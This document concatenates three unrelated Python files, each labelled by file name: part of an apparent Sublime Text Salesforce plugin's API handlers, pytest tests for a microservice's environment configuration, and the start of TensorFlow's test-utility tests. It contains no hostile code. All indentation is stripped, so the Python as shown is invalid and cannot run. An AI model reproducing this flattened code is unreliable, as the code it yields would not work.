sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if "success" in result and not result["success"]:
return
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Sync Test Coverage Report",
"input": util.parse_sync_test_coverage(result)
})
if settings["debug_mode"]:
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Sync Test Raw Response",
"input": json.dumps(result, indent=4)
})
# Keep the coverage to local cache
codeCoverages = result["codeCoverage"]
cache_dir = os.path.join(settings["workspace"], ".config")
cache_file = os.path.join(cache_dir, "coverage.json")
coverages = {}
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
elif os.path.isfile(cache_file):
coverages = json.loads(open(cache_file).read())
# Upsert exist code coverage info
for codeCoverage in codeCoverages:
lowerName = codeCoverage["name"].lower()
coverages[lowerName] = codeCoverage
with open(cache_file, "w") as fp:
fp.write(json.dumps(coverages, indent=4))
# Get the latest debug log
sublime.active_window().run_command('fetch_debug_log', {
"fetch_self": True
})
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.run_tests_synchronous, args=(class_names[0], test_names))
thread.start()
wait_message = "Running Sync Test Classes%s" % (
" for %s" % class_names[0] if len(class_names) == 1 else ""
)
ThreadProgress(api, thread, wait_message, wait_message + " Succeed")
handle_thread(thread, timeout)
def handle_generate_sobject_soql(sobject, filter, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
# Error Message are prcoessed in ThreadProgress
if not result["success"]: return
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": sobject + " SOQL",
"input": result["soql"]
})
# Keep sobject describe history
util.add_operation_history('SOQL/' + sobject, result["soql"])
settings = context.get_settings()
api = ToolingApi(settings)
if filter != "all":
args = (sobject, filter, )
else:
args = (sobject, )
thread = threading.Thread(target=api.combine_soql, args=args)
thread.start()
wait_message = 'Generate SOQL for ' + sobject
ThreadProgress(api, thread, wait_message, wait_message + ' Succeed')
handle_new_view_thread(thread, timeout)
def handle_describe_sobject(sobject, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
# Error Message are prcoessed in ThreadProgress
if not result["success"]: return
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.settings().set("word_wrap", False)
describe_result = util.parse_sobject_field_result(result)
view.run_command("new_view", {
"name": sobject + " Describe Result",
"input": describe_result
})
view.set_syntax_file("Packages/Textile/Textile.tmLanguage")
# Keep sobject describe history
util.add_operation_history('describe/' + sobject, describe_result)
settings = context.get_settings()
api = ToolingApi(settings)
sobject_url = "/sobjects/" + sobject + "/describe"
thread = threading.Thread(target=api.get, args=(sobject_url, ))
thread.start()
ThreadProgress(api, thread, 'Describe ' + sobject, 'Describe ' + sobject + ' Succeed')
handle_new_view_thread(thread, timeout)
def handle_export_specified_workbooks(sobjects, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
threads = []
mcc = settings["maximum_concurrent_connections"]
chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
for cs in chunked_sobjects:
thread = threading.Thread(target=api.generate_workbook, args=(cs, ))
threads.append(thread)
thread.start()
ThreadsProgress(threads, "Generating Sobjects Workbook",
"Sobjects Workbook are Generated")
def handle_export_all_workbooks(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# Exception Process
if not api.result["success"]: return
# If succeed
sobjects = []
for sd in api.result["sobjects"]:
if "name" not in sd: continue
sobjects.append(sd["name"])
mcc = settings["maximum_concurrent_connections"]
chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
for sobjects in chunked_sobjects:
thread = threading.Thread(target=api.generate_workbook, args=(sobjects, ))
thread.start()
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Describe Global", "Describe Global Succeed")
handle_thread(thread, timeout)
def handle_new_project(is_update=False, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If failed, but something may happen,
# for example, user password is expired
result = api.result
if not result or not result["success"]: return
# Extract the apex code to workspace
extract_to = settings["workspace"]
# Just remove the packages folder and src folder
if os.path.exists(extract_to):
# Remove packages directory
if os.path.exists(os.path.join(extract_to, "packages")):
try:
shutil.rmtree(os.path.join(extract_to, "packages"))
except Exception as e:
pass
# Makedir for subscribed meta types
for metadata_folder in settings["subscribed_metadata_folders"]:
outputdir = os.path.join(extract_to, "src", metadata_folder);
if not os.path.exists(outputdir): os.makedirs(outputdir)
# Extract the zipFile to extract_to
thread = threading.Thread(target=util.extract_encoded_zipfile,
args=(result["zipFile"], extract_to, ))
thread.start()
# Apex Code Cache
if "fileProperties" in result and isinstance(result["fileProperties"], list):
util.reload_file_attributes(result["fileProperties"], settings)
else:
if settings["debug_mode"]:
print ('[Debug] fileProperties:\n' + json.dumps(result, indent=4))
# Hide panel
sublime.set_timeout_async(Printer.get("log").hide_panel, 500)
# Reload sObject Cache and SymbolTables
if not is_update:
handle_reload_sobjects_completions()
if settings["reload_symbol_tables_when_create_project"]:
handle_reload_symbol_tables()
# Write the settings to local cache
# Not keep the confidential info to .settings
# Since 2015.11.26, stop to keep settings.json
# del settings["projects"]
# del settings["password"]
# del settings["default_project"]
# util.add_config_history('settings', settings, settings)
settings = context.get_settings()
api = MetadataApi(settings)
types = {}
for xml_name in settings["subscribed_metadata_objects"]:
types[xml_name] = ["*"]
thread = threading.Thread(target=api.retrieve, args=({
"types": types,
"package_names": settings["allowed_packages"]
}, ))
thread.start()
wating_message = ("Creating New " if not is_update else "Updating ") + " Project"
ThreadProgress(api, thread, wating_message, wating_message + " Finished")
handle_thread(thread, timeout)
def handle_describe_metadata(callback_options, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# Exception is processed in ThreadProgress
if not api.result or not api.result["success"]: return
result = api.result
del result["success"]
settings = context.get_settings()
cache_dir = os.path.join(settings["workspace"], ".config")
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
cache_file = os.path.join(cache_dir, "metadata.json")
with open(cache_file, "w") as fp:
fp.write(json.dumps(result, indent=4))
if "callback_command" in callback_options:
settings = context.get_settings()
callback_command = callback_options["callback_command"]
args = callback_options["args"] if "args" in callback_options else {}
# If project already have subscribed_metadata_objects, just stop
if "subscribed_metadata_objects" in settings["default_project"] and \
settings["default_project"]["subscribed_metadata_objects"]:
return sublime.active_window().run_command(callback_command, args)
# If project doesn't have subscribed_metadata_objects, we need
# to choose which metadata_objects to subscribe, which will be saved
# into default project
sublime.active_window().run_command("toggle_metadata_objects", {
"callback_options": callback_options
})
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api._invoke_method, args=("describeMetadata", ))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, "Describe Metadata of v%s.0" % settings["api_version"],
"Describe Metadata Finished")
def handle_rename_metadata(file_name, meta_type, old_name, new_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# If not succeed, just stop
if not api.result or not api.result["success"]: return
result = api.result
if "errors" in result:
return Printer.get("error").write(result["errors"]["message"])
os.rename(file_name, file_name.replace(old_name, new_name))
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
options = {"type": meta_type, "old_name": old_name, "new_name": new_name}
thread = threading.Thread(target=api._invoke_method, args=("renameMetadata", options, ))
thread.start()
handle_thread(thread, timeout)
message = "Renaming %s from %s to %s" % (
meta_type, old_name, new_name
)
ThreadProgress(api, thread, message, "Renaming Finished")
def handle_reload_project_cache(types, callback_command, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
if not api.result or not api.result["success"]: return
types = api.result["types"]
cache_dir = os.path.join(settings["workspace"], ".config")
cache_file = os.path.join(cache_dir, "package.json")
cache = types
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
elif os.path.isfile(cache_file):
cache = json.loads(open(cache_file).read())
for _type in types:
cache[_type] = types[_type]
with open(cache_file, "w") as fp:
fp.write(json.dumps(cache, indent=4))
if callback_command:
sublime.active_window().run_command(callback_command)
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.prepare_members, args=(types, True, ))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, "Reloading Project Cache", "Reload Project Cache Succeed")
def handle_retrieve_package(types, extract_to, source_org=None, ignore_package_xml=False, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# If source_org is not None, we need to switch project back
if settings["switch_back_after_migration"] and source_org:
util.switch_project(source_org)
# Extract the zipFile to extract_to
if api.result and api.result["success"]:
thread = threading.Thread(target=util.extract_encoded_zipfile,
args=(api.result["zipFile"], extract_to, ignore_package_xml, ))
thread.start()
# Apex Code Cache
if isinstance(api.result.get("fileProperties", None), list):
util.reload_file_attributes(
api.result["fileProperties"],
settings, append=True
)
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.retrieve, args=({"types": types}, ))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, "Retrieve File From Server",
"Retrieve File From Server Succeed")
def handle_save_to_server(file_name, is_check_only=False, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# Set Thread alive flag to False
globals()[username + file_base_name] = False
# Process request result
result = api.result
# If cancel, just diff with server
if "Operation" in result and result["Operation"] == "cancel":
handle_diff_with_server(component_attribute, file_name)
return
if "success" in result and result["success"]:
# 1. Write succeed body to local change history
if settings["keep_local_change_history"] and not is_check_only:
# Append message to output panel
Printer.get('log').write("Start to keep local change history")
# Get Workspace, if not exist, make it
workspace = settings["workspace"]+"/.history/"+component_attribute["type"]
if not os.path.exists(workspace):
os.makedirs(workspace)
# Backup current file
time_stamp = time.strftime("%Y-%m-%d-%H-%M", time.localtime())
outputdir = workspace+"/"+component_name+"-"+time_stamp+"-history"+extension
with open(outputdir, "wb") as fp:
fp.write(body.encode("utf-8"))
# Output succeed message in the console
save_or_compile = "Compiled" if is_check_only else "Saved"
Printer.get('log').write("%s %s successfully" % (save_or_compile, file_base_name))
# Add total seconds message
dt = datetime.datetime.now() - start_time
total_seconds = dt.seconds + dt.microseconds / 1e6
Printer.get('log').write("\nTotal time: %.2f seconds" % total_seconds, False)
# Remove highlight
view = util.get_view_by_file_name(file_name)
if view:
component_id = component_attribute["id"]
view.run_command("remove_check_point", {"mark":component_id+"build_error"})
# If succeed, just hide it in several seconds later
delay_seconds = settings["delay_seconds_for_hidden_output_panel_when_succeed"]
sublime.set_timeout_async(Printer.get("log").hide_panel, delay_seconds * 1000)
# If track_log_after_saved is true, track self debug log asynchronously
if settings["track_log_after_saved"]:
thread = threading.Thread(target=api.create_trace_flag)
thread.start()
# After all are finished, keep the LastModifiedDate
handle_set_component_attribute(component_attribute)
# If not succeed, just go to the error line
# Because error line in page is always at the line 1, so just work in class or trigger
elif "success" in result and not result["success"]:
# Maybe network issue
if "problem" not in result: return
message = "Compile Error for %s: %s at line %s column %s" % (
file_base_name,
result["problem"],
result["lineNumber"],
result["columnNumber"]
)
Printer.get('log').write(message)
# Get the active view
view = util.get_view_by_file_name(file_name)
# Check current view the saving code file
if not view or not view.file_name(): return
if not file_base_name in view.file_name(): return
if not extension in [".trigger", ".cls", ".page"]: return
if "line" in result:
line = result["line"]
elif "lineNumber" in result:
line = result["lineNumber"]
else:
return
if isinstance(line, list): line = line[0]
if extension == ".page" and line < 2: return
view.run_command("goto_line", {"line": line})
view.run_command("expand_selection", {"to":"line"})
if hasattr(view, 'show_popup'):
error = """
<div>
<h3>Compile Error for %s</h3>
<p style="color: red">
<b>%s</b> at line <b>%s</b> column <b>%s</b>
</p>
</div>
""" % (
file_base_name,
result["problem"],
result["lineNumber"],
result["columnNumber"]
)
view.show_popup(error)
# Add highlight for error line and remove the highlight after several seconds
component_id = component_attribute["id"]
view.run_command("set_check_point", {"mark":component_id+"build_error"})
component_attribute, component_name = util.get_component_attribute(file_name)
body = open(file_name, encoding="utf-8").read()
# Component Full Name
extension = component_attribute["extension"]
file_base_name = component_name + extension
# Log start_time
start_time = datetime.datetime.now()
# If saving is in process, just skip
settings = context.get_settings()
username = settings["username"]
if username + file_base_name in globals():
is_thread_alive = globals()[username + file_base_name]
if is_thread_alive:
print ('%s is in process' % file_base_name);
return
# Open panel
compile_or_save = "compile" if is_check_only else "save"
Printer.get('log').write_start().write("Start to %s %s" % (compile_or_save, file_base_name))
api = ToolingApi(settings)
if component_attribute["type"] in ["AuraDefinitionBundle", "AuraDefinition"]:
target = api.save_aura_to_server
else:
target = api.save_to_server
thread = threading.Thread(target=target,
args=(component_attribute, body, is_check_only, ))
thread.start()
# If saving thread is started, set the flag to True
globals()[username + file_base_name] = True
# Display thread progress
wait_message = ("Compiling " if is_check_only else "Saving ") + component_name
ThreadProgress(api, thread, wait_message, wait_message + " Succeed", show_error=False)
handle_thread(thread, timeout)
def handle_create_component(data, component_name, component_type, markup_or_body, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# If create Succeed
result = api.result
# If created failed, just remove it
if not result["success"]:
os.remove(file_name)
return
# If created succeed, just open it
sublime.active_window().open_file(file_name)
# Get the created component id
component_id = result.get("id")
extension = "." + settings[component_type]["suffix"]
# Save it to component.sublime-settings
s = sublime.load_settings(COMPONENT_METADATA_SETTINGS)
username = settings["username"]
components_dict = s.get(username, {})
# Prevent exception for creating component if no component in org
if component_type not in components_dict:
if not components_dict:
components_dict = {component_type : {}}
else:
components_dict[component_type] = {}
# Build components dict
lower_name = component_name.lower()
attributes = {
"id": component_id,
"name": component_name,
"url": post_url + "/" + component_id,
"body": markup_or_body,
"extension": extension,
"type": component_type,
"is_test": lower_name.startswith("test") or lower_name.endswith("test")
}
components_dict[component_type][fullName.lower()] = attributes
s.set(username, components_dict)
# Save settings and show success message
sublime.save_settings(COMPONENT_METADATA_SETTINGS)
# After new component is stored into cache, reload cache in globals()
sublime.set_timeout(lambda:util.load_metadata_cache(True), 50)
# Create Meta.xml File
if component_type in ["ApexClass", "ApexTrigger"]:
meta_file_content = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +\
"<{0} xmlns=\"http://soap.sforce.com/2006/04/metadata\">\n" +\
" <apiVersion>{1}.0</apiVersion>\n" +\
" <status>Active</status>\n" +\
"</{0}>").format(component_type, settings["api_version"])
elif component_type in ["ApexPage", "ApexComponent"]:
meta_file_content = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +\
"<{0} xmlns=\"http://soap.sforce.com/2006/04/metadata\">\n" +\
" <apiVersion>{1}.0</apiVersion>\n" +\
" <label>{2}</label>\n" +\
"</{0}>").format(component_type, settings["api_version"], component_name)
# Generate new meta.xml file
with open(file_name+"-meta.xml", "w") as fp:
fp.write(meta_file_content)
# After all are finished, we need to keep the lastModifiedDate
handle_set_component_attribute(attributes)
settings = context.get_settings()
api = ToolingApi(settings)
post_url = "/sobjects/" + component_type
thread = threading.Thread(target=api.post, args=(post_url, data, ))
thread.start()
fullName = os.path.basename(file_name)
ThreadProgress(api, thread, "Creating Component %s" % fullName,
"Creating Component %s Succeed" % fullName)
handle_thread(thread, timeout)
def handle_set_component_attribute(attributes, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
result = api.result
if result["success"] and result["records"]:
lastModifiedDate = result["records"][0]["LastModifiedDate"]
util.set_component_attribute(attributes, lastModifiedDate)
elif settings["debug_mode"]:
pprint.pprint(result)
# Refresh metadata cache
util.load_metadata_cache(True)
settings = context.get_settings()
api = ToolingApi(settings)
soql = "SELECT LastModifiedDate FROM %s WHERE Id = '%s'" % (
attributes["type"], attributes["id"]
)
thread = threading.Thread(target=api.query, args=(soql, True, ))
thread.start()
handle_thread(thread, timeout)
def handle_refresh_static_resource(component_attribute, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
if not api.result["success"]: return
with open (file_name, "wb") as fp:
fp.write(api.result["body"].encode("utf-8"))
settings = context.get_settings()
api = ToolingApi(settings)
url = component_attribute["url"] + "/body"
thread = threading.Thread(target=api.retrieve_body, args=(url, ))
thread.start()
ThreadProgress(api, thread, 'Refresh StaticResource', 'Refresh StaticResource Succeed')
handle_thread(thread, timeout)
def handle_create_static_resource(data, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
if not api.result["success"]:
return
print (api.result)
settings = context.get_settings()
api = ToolingApi(settings)
url = "/tooling/sobjects/StaticResource"
thread = threading.Thread(target=api.post, args=(url, data, ))
thread.start()
ThreadProgress(api, thread, 'Creating StaticResource', 'Creating StaticResource Succeed')
handle_thread(thread, timeout)
def handle_diff_with_server(component_attribute, file_name, source_org=None, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
result = api.result
# If error, just skip, error is processed in ThreadProgress
if not result["success"]: return
# Diff Change Compare
diff.diff_changes(file_name, result)
# If source_org is not None, we need to switch project back
if settings["switch_back_after_migration"] and source_org:
util.switch_project(source_org)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.get, args=(component_attribute["url"], ))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, 'Diff With Server', 'Diff With Server Succeed')
def handle_refresh_file_from_server(attr, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]:
return
with open(file_name, "wb") as fp:
fp.write(result[attr["body"]].encode("utf-8"))
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.get, args=(attr["url"], ))
thread.start()
ThreadProgress(api, thread, 'Refreshing %s' % os.path.basename(file_name), 'Refresh Succeed')
handle_thread(thread, timeout)
def handle_delete_component(component_url, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result["success"]: return
# Get active window
window = sublime.active_window()
# Remove file from disk and close related view
view = util.get_view_by_file_name(file_name)
if view:
window.focus_view(view)
window.run_command("close")
os.remove(file_name)
# Remove the related cls-meta.xml
if os.path.exists(file_name+"-meta.xml"):
view = util.get_view_by_file_name(file_name+"-meta.xml")
if view:
window.focus_view(view)
window.run_command("close")
os.remove(file_name+"-meta.xml")
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.delete, args=(component_url, ))
thread.start()
file_base_name = os.path.basename(file_name)
ThreadProgress(api, thread, "Deleting " + file_base_name,
"Delete " + file_base_name + " Succeed")
handle_thread(thread, timeout)
|
test_environment.py
|
import os
import threading
import time
from pathlib import Path
import pytest
import requests
from coworks.config import Config, ProdConfig
from coworks.cws.runner import CwsRunner
from coworks.cws.runner import ThreadedLocalServer
from tests.coworks.tech_ms import *
class WithEnvMS(SimpleMS):
def __init__(self, **kwargs):
super().__init__(**kwargs)
@self.before_first_activation
def init(event, context):
assert os.getenv("test") is not None
@entry
def get(self):
"""Root access."""
return os.getenv("test")
class TestClass:
def test_dev_stage(self, local_server_factory, example_dir):
config = Config(environment_variables_file=Path(example_dir) / "config" / "vars_dev.json")
local_server = local_server_factory(WithEnvMS(configs=config))
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test dev environment variable'
def test_run_dev_stage(self, example_dir):
config = Config(environment_variables_file=Path("config") / "vars_dev.json")
app = WithEnvMS(configs=config)
CwsRunner(app)
port = ThreadedLocalServer.unused_tcp_port()
server = threading.Thread(target=run_server_example, args=(example_dir, app, port), daemon=True)
server.start()
counter = 1
time.sleep(counter)
while not server.is_alive() and counter < 3:
time.sleep(counter)
counter += 1
response = requests.get(f'http://localhost:{port}/', headers={'Authorization': "token"})
assert response.text == "test dev environment variable"
def test_secret_stage(self, local_server_factory, example_dir):
config = Config(environment_variables_file=Path(example_dir) / "config" / "vars_prod.json")
local_server = local_server_factory(WithEnvMS(configs=config))
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test secret environment variable'
def test_workspace_stage(self, local_server_factory, example_dir):
config = Config(workspace='test', environment_variables_file=Path(example_dir) / "config" / "vars_prod.json")
local_server = local_server_factory(WithEnvMS(configs=config), workspace='test')
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test secret environment variable'
def test_prod_stage(self, local_server_factory, example_dir):
def auth(*args):
return True
config1 = Config(environment_variables_file=Path(example_dir) / "config" / "vars_dev.json")
config2 = ProdConfig(environment_variables_file=Path(example_dir) / "config" / "vars_prod.json", auth=auth)
local_server = local_server_factory(WithEnvMS(configs=[config1, config2]), workspace="v1")
response = local_server.make_call(requests.get, '/', headers={'authorization':'token'})
assert response.status_code == 200
assert response.text == 'test secret environment variable'
def test_not_prod_stage(self, local_server_factory, example_dir):
config1 = Config(workspace='1', environment_variables_file=Path(example_dir) / "config" / "vars_dev.json")
config2 = ProdConfig(environment_variables_file=Path(example_dir) / "config" / "vars_prod.json")
local_server = local_server_factory(WithEnvMS(configs=[config1, config2]), workspace='1')
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test dev environment variable'
def test_no_config_stage(self, local_server_factory, example_dir):
config1 = Config(environment_variables_file=Path(example_dir) / "config" / "vars_dev.json")
config2 = ProdConfig(environment_variables_file=Path(example_dir) / "config" / "vars_prod.json")
local_server = local_server_factory(WithEnvMS(configs=[config1, config2]),
project_dir=Path(example_dir) / "config", workspace='1')
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test default environment variable'
def test_env_var(self, local_server_factory):
config = Config(environment_variables={'test': 'test value environment variable'})
local_server = local_server_factory(WithEnvMS(configs=config))
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test value environment variable'
def test_wrong_env_var_name(self, local_server_factory):
config = Config(environment_variables={'1test': 'test value environment variable'})
with pytest.raises(KeyError) as pytest_wrapped_e:
local_server = local_server_factory(WithEnvMS(configs=config))
assert pytest_wrapped_e.type == KeyError
assert pytest_wrapped_e.value.args[0] == "Wrong environment variable name: 1test"
def run_server_example(example_dir, app, port):
print(f"Server starting on port {port}")
app.execute('run', host='localhost', port=port, project_dir=example_dir, module='example', workspace='dev')
|
test_util_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import random
import threading
import unittest
import weakref
from absl.testing import parameterized
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops # pylint: disable=unused-import
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase, parameterized.TestCase):
def test_assert_ops_in_graph(self):
with ops.Graph().as_default():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
@test_util.run_deprecated_v1
def test_session_functions(self):
with self.test_session() as sess:
sess_ref = weakref.ref(sess)
with self.cached_session(graph=None, config=None) as sess2:
# We make sure that sess2 is sess.
assert sess2 is sess
# We make sure we raise an exception if we use cached_session with
# different values.
with self.assertRaises(ValueError):
with self.cached_session(graph=ops.Graph()) as sess2:
pass
with self.assertRaises(ValueError):
with self.cached_session(force_gpu=True) as sess2:
pass
# We make sure that test_session will cache the session even after the
# with scope.
assert not sess_ref()._closed
with self.session() as unique_sess:
unique_sess_ref = weakref.ref(unique_sess)
with self.session() as sess2:
assert sess2 is not unique_sess
# We make sure the session is closed when we leave the with statement.
assert unique_sess_ref()._closed
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegex(AssertionError,
r"^Found unexpected node '{{node seven}}"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testIsMklEnabled(self):
# This test doesn't assert anything.
# It ensures the py wrapper function is generated correctly.
if test_util.IsMklEnabled():
print("MKL is enabled")
else:
print("MKL is disabled")
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegex(AssertionError, r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
@test_util.run_in_graph_and_eager_modes
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
with ops.Graph().as_default():
node_def = ops._NodeDef("IntOutput", "name")
node_def_orig = ops._NodeDef("IntOutput", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
op = ops.Operation(node_def, ops.get_default_graph(),
original_op=op_orig)
